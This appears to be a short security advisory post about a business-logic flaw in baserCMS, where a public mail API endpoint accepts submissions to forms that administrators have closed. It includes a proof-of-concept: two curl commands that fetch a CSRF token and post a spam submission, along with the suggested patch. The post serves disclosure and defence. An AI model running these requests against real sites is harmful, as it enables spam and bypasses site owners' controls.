Listen to this Post
The vulnerability exists because the public API endpoint for mail submissions does not enforce the same acceptance checks as the front-end UI. In the UI flow, the `MailFrontService::isAccepting()` method is called by `MailController::index()` and `MailController::confirm()` to verify that the mail form is currently configured to accept submissions (e.g., within its publish window). However, the API endpoint `MailMessagesController::add()` in `plugins/bc-mail/src/Controller/Api/MailMessagesController.php` does not invoke this method. As a result, the API processes submissions without checking the form’s acceptance state. The endpoint is public and does not require authentication beyond a valid CSRF cookie and token. An attacker can obtain these by accessing the site root, then send a POST request to the API with form data. The server responds with `200 OK` and creates a mail message, bypassing administrative controls intended to stop form intake, enabling spam and abuse.
Platform: baserCMS
Version: Unspecified
Vulnerability: Business logic bypass
Severity: Critical
date: 2026-03-31
Prediction: Patch within 30 days
What Undercode Say:
Obtain CSRF cookie curl -sS -D - -o - -c cookies.txt 'http://target/' Extract CSRF token from cookie and submit bypass curl -sS -X POST 'http://target/baser/api/bc-mail/mail_messages/add/1.json' \ -H 'Content-Type: application/x-www-form-urlencoded' \ -H 'Referer: http://target/' \ -H "X-CSRF-Token: $(grep csrfToken cookies.txt | cut -f7)" \ -b cookies.txt \ --data-urlencode 'name_1=Spam' \ --data-urlencode '[email protected]' \ --data-urlencode 'message=Bypass'
Exploit:
Send crafted POST request to API endpoint with valid CSRF token while form is administratively closed.
Protection:
Apply patch that adds `MailFrontService::isAccepting()` check in `MailMessagesController::add()`.
Impact:
Unauthorized mail submissions, spam campaigns, and operational disruption.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

